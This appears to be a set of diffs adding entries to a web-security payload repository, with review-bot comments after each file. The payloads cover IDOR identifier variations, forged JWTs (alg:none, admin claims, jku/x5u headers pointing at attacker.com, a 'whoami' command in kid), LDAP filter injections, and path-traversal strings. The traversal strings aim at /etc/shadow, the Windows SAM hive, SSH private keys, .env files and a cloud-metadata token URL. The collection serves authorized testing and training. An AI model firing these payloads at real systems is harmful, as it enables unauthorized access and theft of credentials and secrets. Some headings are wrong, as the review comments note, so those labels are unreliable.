/api/v2/user/1/settings
/api/user/1/private
/api/user/2/documents
# Subdomain enumeration
user1.example.com
user2.example.com
admin.example.com
# GUID/UUID variations
?id=00000000-0000-0000-0000-000000000000
?id=ffffffff-ffff-ffff-ffff-ffffffffffff
?id=12345678-1234-1234-1234-123456789012
?uuid=a1b2c3d4-e5f6-4a5b-8c7d-9e0f1a2b3c4d
# Base64 encoded IDs
?id=MQ==
?id=Mg==
?id=YWRtaW4=
?user=dXNlcjE=
# Hash-based IDs
?id=5f4dcc3b5aa765d61d8327deb882cf99
?id=098f6bcd4621d373cade4e832627b4f6
?token=abc123def456
# Numeric variations
?id=0001
?id=0010
?id=0100
?id=1000
?user_id=00001
?customer_id=00100
# Special characters in IDs
?id=../1
?id=../../2
?id=..%2f1
?id=%2e%2e%2f1
# API endpoint variations
/api/orders/1
/api/orders/2
/api/invoices/1
/api/transactions/1
/api/messages/1
/api/posts/1/edit
/api/comments/1/delete
# Cookie-based IDOR
Cookie: user_id=1
Cookie: user_id=2
Cookie: session_id=user1
Cookie: account=1
# Header-based IDOR
X-User-Id: 1
X-User-Id: 2
X-Account-Id: 1
X-Customer-Id: 2
# JSON body IDOR
{"user_id": 1}
{"user_id": 2}
{"account_id": 1}
{"profile_id": 2}
# Compound IDs
?user_id=1&account_id=1
?id=1&type=admin
?user=1&role=admin
# Email-based enumeration
?email=user1@example.com
?email=user2@example.com
?email=admin@example.com
?email=test@test.com
# Phone number enumeration
?phone=1234567890
?phone=+11234567890
?mobile=9876543210
# Date-based IDs
?date=2024-01-01
?created_at=2024-01-01
?year=2024&month=01&day=01
# Predictable patterns
?ref=INV-001
?ref=INV-002
?order=ORD-1000
?order=ORD-1001
?ticket=TKT-001
# Encoded variations
?id=1%00
?id=1%0a
?id=1%0d
?id=1%20
# Boolean values
?admin=true
?admin=false
?is_admin=1
?is_admin=0
?superuser=true
# Wildcard attempts
?id=*
?user=*
?search=*
# Negative numbers
?id=-1
?id=-10
?id=-100
?offset=-1
# Large numbers
?id=999999999
?id=2147483647
?id=9999999999999
# Float/Decimal
?id=1.0
?id=1.5
?amount=0.01
# SQL-style injection in IDOR
?id=1' OR '1'='1
?id=1 OR 1=1
?id=1 UNION SELECT * FROM users
# NoSQL-style injection in IDOR
?id[$ne]=1
?id[$gt]=0
?user[$regex]=admin
# XML-style
?id=<id>1</id>
?user=<user>admin</user>
# GraphQL IDOR
?query={user(id:1){name,email}}
?query={user(id:2){name,email}}
# REST variations
/users/me
/users/self
/users/current
/users/1
/users/2
# Hyphenated IDs
?id=user-1
?id=account-2
?ref=invoice-001
# Underscore IDs
?id=user_1
?id=account_2
?id=customer_001
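Review bot: the `# SQL-style injection in IDOR`, `# NoSQL-style injection in IDOR` and `# XML-style` sections are injection payloads rather than access-control tests, and `# Subdomain enumeration` lists hostnames rather than request parameters; suggest moving them to the relevant payload files and cross-referencing, so this file stays a list of identifier variations. The file also never states the precondition that makes any entry meaningful, namely that the request is sent under a second, lower-privileged account and the response compared with the owner's; a one-line note at the top would stop the list being read as a set of unauthenticated probes. Minor: the `# Hash-based IDs` entries are MD5 of `password` and `test`, which is worth saying in the comment so readers know they stand for identifiers derived from guessable input.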
@@ -0,0 +1,47 @@
# JWT (JSON Web Token) Vulnerabilities
## Description
JWT vulnerabilities occur when JSON Web Tokens are improperly implemented or validated, allowing attackers to forge tokens, escalate privileges, or bypass authentication mechanisms. JWTs are widely used for authentication and authorization in modern web applications.
## Common Vulnerabilities
- **None Algorithm** - Setting `alg` to `none` to bypass signature verification
- **Algorithm Confusion** - Switching from RS256 to HS256
- **Weak Secret Key** - Using weak or default secrets for HMAC
- **Key Injection** - Injecting public key in JWK header
- **Token Expiration** - Missing or improper `exp` validation
- **SQL Injection in Claims** - Injecting SQL in JWT claims
- **XSS in Claims** - Storing and reflecting XSS payloads in JWT
## JWT Structure
```
header.payload.signature
```
- **Header**: Contains algorithm and token type
- **Payload**: Contains claims (user data)
- **Signature**: Cryptographic signature
## Common Attack Vectors
- Authentication endpoints
- Authorization headers
- Cookie-based JWT storage
- URL parameters with JWT
- Local/Session storage
## Impact
- Authentication bypass
- Privilege escalation
- Account takeover
- Access to unauthorized resources
- Identity spoofing
## Testing Approach
1. Decode the JWT to examine header and payload
2. Test with `alg: none` in header
3. Test algorithm confusion (RS256 → HS256)
4. Brute force weak secrets
5. Modify claims (user ID, role, permissions)
6. Test token expiration validation
7. Check for sensitive data exposure in payload
## Payloads
See `jwt-vulnerabilities-payloads.txt` for a comprehensive list of JWT attack payloads.
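Review bot: the file has Description, Impact and Testing Approach sections but no Remediation section, so the defensive counterpart of each listed vulnerability is left implicit; suggest adding one stating that the server pins the accepted algorithm in code rather than trusting the token's `alg` (which closes both the `none` and the RS256-to-HS256 items), rejects tokens without `exp` and enforces it, treats `kid` as an opaque lookup key rather than a path, and never accepts a key carried in the token's own `jwk` header. Also `**SQL Injection in Claims**` and `**XSS in Claims**` are injection issues in whatever consumes the claims rather than flaws in JWT validation; a sentence saying so would keep the list consistent with the `## JWT Structure` section.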
@@ -0,0 +1,259 @@
# JWT Vulnerabilities Payloads
# None Algorithm Attack
# Change alg to "none" and remove signature
# Original: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCJ9.signature
# Modified: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Header: {"alg":"none","typ":"JWT"}
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Header: {"alg":"None","typ":"JWT"}
eyJhbGciOiJOb25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Header: {"alg":"NONE","typ":"JWT"}
eyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Header: {"alg":"nOnE","typ":"JWT"}
eyJhbGciOiJuT25FIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Algorithm Confusion Attack (RS256 to HS256)
# Change algorithm from RS256 to HS256 and sign with public key
# Header: {"alg":"HS256","typ":"JWT"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature_here
# Weak Secret Brute Force
# Common weak secrets to test
secret
password
123456
12345678
admin
test
jwt
key
default
secret123
password123
qwerty
abc123
letmein
changeme
welcome
monkey
12345
iloveyou
trustno1
dragon
# Modified Claims - Privilege Escalation
# Payload: {"user":"admin"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.
# Payload: {"role":"admin"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoiYWRtaW4ifQ.
# Payload: {"admin":true}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG1pbiI6dHJ1ZX0.
# Payload: {"isAdmin":true}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc0FkbWluIjp0cnVlfQ.
# Payload: {"permissions":["admin","read","write","delete"]}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwZXJtaXNzaW9ucyI6WyJhZG1pbiIsInJlYWQiLCJ3cml0ZSIsImRlbGV0ZSJdfQ.
# User ID Manipulation
# Payload: {"userId":1}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjF9.
# Payload: {"sub":"1"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxIn0.
# Payload: {"id":1}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MX0.
# Token Expiration Bypass
# Payload: {"exp":9999999999}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjk5OTk5OTk5OTl9.
# Payload: No exp field
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.
# Payload: {"exp":null}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOm51bGx9.
# JWK Header Injection
# Header: {"alg":"RS256","typ":"JWT","jwk":{"kty":"RSA","kid":"key1","n":"...","e":"AQAB"}}
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImp3ayI6eyJrdHkiOiJSU0EiLCJraWQiOiJrZXkxIiwibiI6Ii4uLiIsImUiOiJBUUFCIn19.payload.signature
# Kid Parameter Injection
# Header: {"alg":"HS256","typ":"JWT","kid":"../../public.key"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uLy4uL3B1YmxpYy5rZXkifQ.payload.signature
# Header: {"alg":"HS256","typ":"JWT","kid":"/dev/null"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii9kZXYvbnVsbCJ9.payload.signature
# Header: {"alg":"HS256","typ":"JWT","kid":"../../../dev/null"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uLy4uLy4uL2Rldi9udWxsIn0.payload.signature
# SQL Injection in Claims
# Payload: {"username":"admin' OR '1'='1"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluJyBPUiAnMSc9JzEifQ.
# Payload: {"user":"admin'--"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4nLS0ifQ.
# XSS in Claims
# Payload: {"name":"<script>alert(1)</script>"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PiJ9.
# Payload: {"comment":"<img src=x onerror=alert(1)>"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjb21tZW50IjoiPGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPiJ9.
# Empty Signature
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.
# Invalid Signature
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.invalid
# JKU Header Injection (JWK Set URL)
# Header: {"alg":"RS256","typ":"JWT","jku":"https://attacker.com/jwks.json"}
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImprdSI6Imh0dHBzOi8vYXR0YWNrZXIuY29tL2p3a3MuanNvbiJ9.payload.signature
# X5U Header Injection (X.509 URL)
# Header: {"alg":"RS256","typ":"JWT","x5u":"https://attacker.com/cert.pem"}
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsIng1dSI6Imh0dHBzOi8vYXR0YWNrZXIuY29tL2NlcnQucGVtIn0.payload.signature
# X5C Header Injection (X.509 Certificate Chain)
# Header: {"alg":"RS256","typ":"JWT","x5c":["MIIC..."]}
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsIng1YyI6WyJNSUlDLi4uIl19.payload.signature
# Critical Header Parameter Bypass
# Header: {"alg":"HS256","typ":"JWT","crit":["exp"],"exp":9999999999}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImNyaXQiOlsiZXhwIl0sImV4cCI6OTk5OTk5OTk5OX0.payload.signature
# Type Confusion
# Header: {"alg":"HS256","typ":"JWE"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXRSJ9.payload.signature
# Null Byte Injection in Kid
# Header: {"alg":"HS256","typ":"JWT","kid":"key\u0000admin"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6ImtleVx1MDAwMGFkbWluIn0.payload.signature
# Command Injection in Kid
# Header: {"alg":"HS256","typ":"JWT","kid":"key; whoami"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6ImtleTsgd2hvYW1pIn0.payload.signature
# Path Traversal in Kid
# Header: {"alg":"HS256","typ":"JWT","kid":"../../../../etc/passwd"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uLy4uLy4uLy4uL2V0Yy9wYXNzd2QifQ.payload.signature
# SQL Injection in Kid
# Header: {"alg":"HS256","typ":"JWT","kid":"key' OR '1'='1"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6ImtleScgT1IgJzEnPScxIn0.payload.signature
# Audience Manipulation
# Payload: {"aud":"admin-api"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJhZG1pbi1hcGkifQ.
# Payload: {"aud":["admin","user","guest"]}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOlsiYWRtaW4iLCJ1c2VyIiwiZ3Vlc3QiXX0.
# Issuer Manipulation
# Payload: {"iss":"trusted-issuer"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJ0cnVzdGVkLWlzc3VlciJ9.
# Not Before (nbf) Bypass
# Payload: {"nbf":0}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjB9.
# JWT ID (jti) Manipulation
# Payload: {"jti":"admin-token-123"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqdGkiOiJhZG1pbi10b2tlbi0xMjMifQ.
# Scope Escalation
# Payload: {"scope":"admin read write delete"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzY29wZSI6ImFkbWluIHJlYWQgd3JpdGUgZGVsZXRlIn0.
# Custom Claims Injection
# Payload: {"custom_role":"superadmin"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjdXN0b21fcm9sZSI6InN1cGVyYWRtaW4ifQ.
# Payload: {"groups":["admin","developers","security"]}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJncm91cHMiOlsiYWRtaW4iLCJkZXZlbG9wZXJzIiwic2VjdXJpdHkiXX0.
# Numeric Value Manipulation
# Payload: {"level":999}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsZXZlbCI6OTk5fQ.
# Payload: {"credit":999999}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjcmVkaXQiOjk5OTk5OX0.
# Boolean Manipulation
# Payload: {"verified":true}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ2ZXJpZmllZCI6dHJ1ZX0.
# Payload: {"premium":true}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwcmVtaXVtIjp0cnVlfQ.
# Array Injection
# Payload: {"roles":["admin","superuser","root"]}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlcyI6WyJhZG1pbiIsInN1cGVydXNlciIsInJvb3QiXX0.
# Null Value Injection
# Payload: {"userId":null}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOm51bGx9.
# Negative Values
# Payload: {"userId":-1}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOi0xfQ.
# Large Numbers
# Payload: {"userId":2147483647}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIxNDc0ODM2NDd9.
# Unicode Injection
# Payload: {"user":"admin\u0000"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW5cdTAwMDAifQ.
# Base64 URL Encoding Issues
# Missing padding
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature
# Extra padding
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9==.eyJ1c2VyIjoiYWRtaW4ifQ==.signature==
# Standard base64 instead of base64url
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9+.eyJ1c2VyIjoiYWRtaW4ifQ/.signature+
# JWT Confusion with Session Tokens
# Use JWT where session token expected
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.
# Empty JWT
..
# Malformed JWT
malformed.jwt.token
header.payload
.payload.signature
header..signature
# JWT in URL
https://target.com/api?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature
# JWT in Cookie
Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature
# Multiple JWTs
Authorization: Bearer jwt1, Bearer jwt2
# JWT with extra segments
header.payload.signature.extra
# Case-sensitive Algorithm
# Header: {"alg":"hs256","typ":"JWT"}
eyJhbGciOiJoczI1NiIsInR5cCI6IkpXVCJ9.payload.signature
# Header: {"alg":"Hs256","typ":"JWT"}
eyJhbGciOiJIczI1NiIsInR5cCI6IkpXVCJ9.payload.signature
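Review bot: the token `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.` is listed four times with four different labels (`# Payload: {"user":"admin"}`, `# Payload: No exp field`, `# Empty Signature`, and the `Authorization: Bearer` line under `# JWT Confusion with Session Tokens`), and every entry under `# Modified Claims`, `# User ID Manipulation`, `# Token Expiration Bypass` and the later claim sections is an HS256 header with an empty signature segment, which only means anything if the verifier skips signature checking, the exact case `# Empty Signature` already covers. Add a comment to those sections saying the tokens are claim templates that must be re-signed with a recovered key (for example one from `# Weak Secret Brute Force`) or delivered through the `alg: none` variants, and dedupe the repeated token. Two labels are wrong: `# Missing padding` describes a correctly encoded token, since JWS Base64url (RFC 7515 §2) omits `=` padding by design, so either drop that entry or relabel it; and `# Critical Header Parameter Bypass` puts `exp` in the header, where it is not the expiry claim verifiers read from the payload, so the entry tests `crit` handling, not expiry. Per RFC 7515 §4.1.11 a verifier must reject a JWS whose `crit` lists a parameter it does not understand, so the comment should state that the expected result is rejection and that acceptance indicates `crit` is ignored. Finally, `signature_here`, `payload`, `signature` and the `"n":"..."` value in the JWK entry are placeholders; mark them as such so they are not sent literally.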
+101
@@ -37,3 +37,104 @@ mail=*
# Attribute extraction # Attribute extraction
*)(objectClass=*))(%26(objectClass=* *)(objectClass=*))(%26(objectClass=*
*)(uid=*))(%26(uid=* *)(uid=*))(%26(uid=*
# Extended filter injection
*)(|(objectClass=*))
*))%00
%28%29
%26
%7C
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
# Advanced authentication bypass
*)(&(objectClass=*))
*))%00(cn=administrator
admin*)((|userpassword=*)
admin*)((|mail=*))
*)((|(cn=*))
*)(uid=*))(&(uid=*))
# Privilege escalation attempts
*)(userAccountControl:1.2.840.113556.1.4.803:=512)
*)(adminCount=1)
*)(memberOf=CN=Domain Admins*)
*)(memberOf=*)
# Time-based blind LDAP injection
*)(cn=admin))(|(cn=*
*)(cn=a*)(|(cn=*
*)(cn=ab*)(|(cn=*
*)(cn=abc*)(|(cn=*
# Special characters and encoding
%2a
%28
%29
%26
%7c
*%00
%00*
*%20
%20*
# DN injection
cn=*,ou=*,dc=*
cn=admin,ou=*,dc=*
cn=*,ou=users,dc=*
# Multi-attribute injection
(&(uid=admin)(userPassword=*))
(&(cn=admin)(mail=*))
(&(objectClass=person)(uid=*))
(|(&(uid=admin)(userPassword=*))(uid=backup))
# Error-based injection
()
(&)
(|)
(!)
(&(uid=admin)(!(cn=*)))
# Filter chain attacks
*))(|(objectClass=*
*))(|(mail=*
*))(|(userPassword=*
# Attribute enumeration
(uid=*)
(cn=*)
(sn=*)
(mail=*)
(telephoneNumber=*)
(userPassword=*)
(description=*)
# Nested filter injection
(&(uid=admin)(&(cn=*)))
(|(&(uid=admin)(cn=*))(uid=test))
(&(objectClass=person)(|(uid=admin)(uid=root)))
# Comment injection
*);#
*);--
*)//
# Group enumeration
(memberOf=cn=admins*)
(memberOf=cn=users*)
(memberOf=*)
# Substring search
(cn=adm*)
(cn=*admin)
(cn=*admin*)
(uid=a*)
(mail=*@admin.com)
# Range queries
(uidNumber>=1000)
(uidNumber<=5000)
(createTimestamp>=20200101000000Z)
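Review bot: the heading `# Time-based blind LDAP injection` is inaccurate, because LDAP search filters have no delay or sleep primitive; the entries under it (`*)(cn=a*)(|(cn=*`, `*)(cn=ab*)(|(cn=*`, ...) are boolean-based substring probes read from response differences, the same technique as `# Substring search` further down, so rename the heading to something like `# Boolean-based blind (substring enumeration)` and note that the signal is a differing response, not a delay. `# Comment injection` has the same problem: the RFC 4515 filter grammar has no comment syntax, so `*);#`, `*);--` and `*)//` are SQL/C leftovers that only produce a malformed-filter error and belong under `# Error-based injection`. Under `# Privilege escalation attempts`, `userAccountControl:1.2.840.113556.1.4.803:=512` matches the NORMAL_ACCOUNT bit (0x200), i.e. every ordinary user account rather than privileged ones, and a filter injection on its own only widens what a search returns; the section is enumeration and should be labelled as such.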
+290
@@ -55,3 +55,293 @@
../../../.env ../../../.env
../../../web.config ../../../web.config
../../../application.properties ../../../application.properties
# Advanced encoding techniques
..%c0%af
..%c1%9c
..%e0%80%af
..%f0%80%80%af
..%c0%2f
..%c0%5c
# Unicode bypass
..%u2216
..%u2215
..%uEFC8
..%uF025
# 16-bit Unicode
..%c0%af
..%c1%9c
%c0%ae%c0%ae/
%c0%ae%c0%ae%c0%af
# UTF-8 encoding
%e0%80%ae%e0%80%ae/
%c0%2e%c0%2e/
%uff0e%uff0e/
# Overlong UTF-8
..%c0%af
..%e0%80%af
..%c0%2e%c0%2e%c0%2f
# Backslash variations
..\
..\..
..\\
..\\..\\
%2e%2e%5c
%2e%2e%2f
# Mixed slash/backslash
..\/
..\/..\
../\..\
..\/../
# Absolute path bypass
/etc/passwd
/etc/shadow
/etc/hosts
/var/log/apache2/access.log
/var/log/auth.log
/proc/self/environ
/proc/self/cmdline
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
# Windows absolute paths
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\boot.ini
C:\inetpub\wwwroot\web.config
# Nested traversal
....//
....\/
..../\
....\\
# Dot segment bypass
./../
./../../
././../
./.././../
# Multiple slashes
...//
....///
.....////
# Filter bypass with current directory
.//.//.//.//..//
.//.//.//.//.//
# Stripped traversal (if ../ is filtered)
...//...//
....\/....\/
..;/..;/
..;//..;//
# Null byte variations
../../../etc/passwd%00
../../../etc/passwd%00.png
../../../etc/passwd\x00
../../../etc/passwd\0
# Path normalization bypass
/var/www/../../etc/passwd
/./var/./www/./../../etc/passwd
//var//www//../../etc/passwd
# URL parameter pollution
?file=safe.txt&file=../../../etc/passwd
?path=images&path=../../../etc/passwd
# Common web files
../../../index.php
../../../index.html
../../../wp-config.php
../../../configuration.php
../../../settings.php
../../../config.php
../.git/config
../.env
../.htaccess
# Framework-specific files
# Laravel
../../../.env
../../../storage/logs/laravel.log
../../../config/database.php
../../../config/app.php
# Symfony
../../../.env.local
../../../config/packages/security.yaml
../../../var/log/dev.log
# Django
../../../settings.py
../../../manage.py
../../../db.sqlite3
# Spring Boot
../../../application.properties
../../../application.yml
../../../application-prod.properties
# Ruby on Rails
../../../config/database.yml
../../../config/secrets.yml
../../../Gemfile
# Node.js/Express
../../../package.json
../../../.env
../../../config/default.json
# ASP.NET
../../../web.config
../../../Web.config
../../../appsettings.json
../../../appsettings.Production.json
# Java
../../../WEB-INF/web.xml
../../../META-INF/context.xml
../../../WEB-INF/classes/application.properties
# Cloud provider metadata
../../../../../../proc/self/environ
../../../../../../proc/version
../../../../../../proc/cmdline
# AWS metadata
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/dynamic/instance-identity/document
# Azure metadata
http://169.254.169.254/metadata/instance?api-version=2021-02-01
# GCP metadata
http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# Docker
../../../../../../proc/self/cgroup
../../../../../../proc/self/mountinfo
../../../../../../etc/hostname
# Log files
../../../var/log/apache2/access.log
../../../var/log/apache2/error.log
../../../var/log/nginx/access.log
../../../var/log/nginx/error.log
../../../var/log/auth.log
../../../var/log/syslog
../../../var/log/mail.log
../../../var/log/mysql/error.log
# Windows log files
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
# SSH keys
../../../root/.ssh/id_rsa
../../../root/.ssh/id_dsa
../../../root/.ssh/authorized_keys
../../../home/user/.ssh/id_rsa
../../../home/user/.ssh/authorized_keys
# Database files
../../../var/lib/mysql/mysql/user.MYD
../../../var/lib/postgresql/data/pg_hba.conf
../../../var/lib/mongodb/data/db
# Backup files
../../../backup.sql
../../../database.sql
../../../db_backup.sql
../../../site_backup.tar.gz
../../../backup.zip
# Source code files
../../../.git/HEAD
../../../.git/config
../../../.git/logs/HEAD
../../../.svn/entries
../../../.hg/hgrc
# Session files
../../../tmp/sess_*
../../../var/lib/php/sessions/sess_*
../../../tmp/sessions/*
# Cache files
../../../tmp/cache/*
../../../var/cache/*
../../../storage/cache/*
# Temporary files
../../../tmp/*
../../../temp/*
../../../var/tmp/*
# SSRF via path traversal
file:///etc/passwd
file:///C:/Windows/System32/drivers/etc/hosts
file://localhost/etc/passwd
file://127.0.0.1/etc/passwd
# Path traversal in cookies
Cookie: file=../../../etc/passwd
Cookie: path=../../../var/www/html/index.php
# Path traversal in headers
X-File: ../../../etc/passwd
X-Path: ../../../var/www/html/config.php
User-Agent: ../../../etc/passwd
Referer: ../../../etc/passwd
# Path traversal in JSON
{"file":"../../../etc/passwd"}
{"path":"../../../var/www/html/config.php"}
{"template":"../../../etc/passwd"}
# Path traversal in XML
<file>../../../etc/passwd</file>
<path>../../../var/www/html/config.php</path>
# Polyglot path traversal
....//....//....//etc/passwd
..%252f..%252f..%252fetc/passwd
..%c0%af..%c0%af..%c0%afetc/passwd
# Filter evasion
..%00/..%00/..%00/etc/passwd
..%20/..%20/..%20/etc/passwd
..%09/..%09/..%09/etc/passwd
# Case sensitivity (Windows)
..\\..\\..\\..\\..\\..\\..\\.\\ETC\\PASSWD
..\\..\\..\\..\\..\\..\\..\\.\\Etc\\Passwd
# Alternate data streams (Windows)
../../../test.txt::$DATA
../../../test.txt::$INDEX_ALLOCATION
# UNC paths (Windows)
\\\\localhost\\C$\\Windows\\System32\\drivers\\etc\\hosts
\\\\127.0.0.1\\C$\\Windows\\System32\\config\\SAM
# Mac/Linux specific
../../../etc/passwd
../../../etc/master.passwd
../../../private/etc/master.passwd
../../../Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist
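Review bot: the hunk adds several entries the file already has or that it adds twice: `..%c0%af` appears under `# Advanced encoding techniques`, `# 16-bit Unicode` and `# Overlong UTF-8`, `..%c1%9c` under the first two, and `../../../.env`, `../../../web.config` and `../../../application.properties` are present in the hunk's context lines and are added again under the Laravel, Node.js/Express, ASP.NET and Spring Boot headings. Dedupe, and swap two headings while at it: `# 16-bit Unicode` sits over UTF-8 overlong sequences, while the IIS-style `%uXXXX` forms that are actually 16-bit encodings sit under `# Unicode bypass`. The `http://169.254.169.254/...` and `http://metadata.google.internal/...` URLs under `# Cloud provider metadata` and the `file://` URLs under `# SSRF via path traversal` are SSRF probes, not traversal sequences, and belong in an SSRF payload list rather than here. The glob entries (`../../../tmp/sess_*`, `../../../tmp/cache/*`, ...) are not literal paths a file-read parameter will expand; add a comment that the `*` is a pattern for the tester to substitute.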
+4
@@ -12,6 +12,7 @@ This repository contains a complete collection of testing payloads organized by
- **[NoSQL Injection](./NoSQL-Injection/)** - NoSQL database injection (MongoDB, Redis, CouchDB) - **[NoSQL Injection](./NoSQL-Injection/)** - NoSQL database injection (MongoDB, Redis, CouchDB)
- **[XSS (Cross-Site Scripting)](./XSS/)** - Client-side code injection - **[XSS (Cross-Site Scripting)](./XSS/)** - Client-side code injection
- **[Command Injection](./Command-Injection/)** - OS command execution & symbolic link attacks - **[Command Injection](./Command-Injection/)** - OS command execution & symbolic link attacks
- **[SSTI (Server-Side Template Injection)](./SSTI/)** - Template engine exploitation & RCE
- **[CSV Injection](./CSV-Injection/)** - Formula injection in spreadsheets - **[CSV Injection](./CSV-Injection/)** - Formula injection in spreadsheets
- **[LDAP Injection](./LDAP-Injection/)** - Directory service manipulation - **[LDAP Injection](./LDAP-Injection/)** - Directory service manipulation
- **[Log Injection](./Log-Injection/)** - Log file manipulation - **[Log Injection](./Log-Injection/)** - Log file manipulation
@@ -34,6 +35,9 @@ This repository contains a complete collection of testing payloads organized by
**Configuration & Design:** **Configuration & Design:**
- **[Security Misconfiguration](./Security-Misconfiguration/)** - Default credentials, misconfigurations - **[Security Misconfiguration](./Security-Misconfiguration/)** - Default credentials, misconfigurations
- **[CORS Misconfiguration](./CORS-Misconfiguration/)** - Cross-origin resource sharing issues
- **[HTTP Request Smuggling](./HTTP-Request-Smuggling/)** - Request desynchronization attacks
- **[JWT Vulnerabilities](./JWT-Vulnerabilities/)** - JSON Web Token implementation flaws
- **[Business Logic](./Business-Logic/)** - Business logic flaws - **[Business Logic](./Business-Logic/)** - Business logic flaws
- **[Weak Cryptography](./Weak-Cryptography/)** - Weak crypto implementations - **[Weak Cryptography](./Weak-Cryptography/)** - Weak crypto implementations
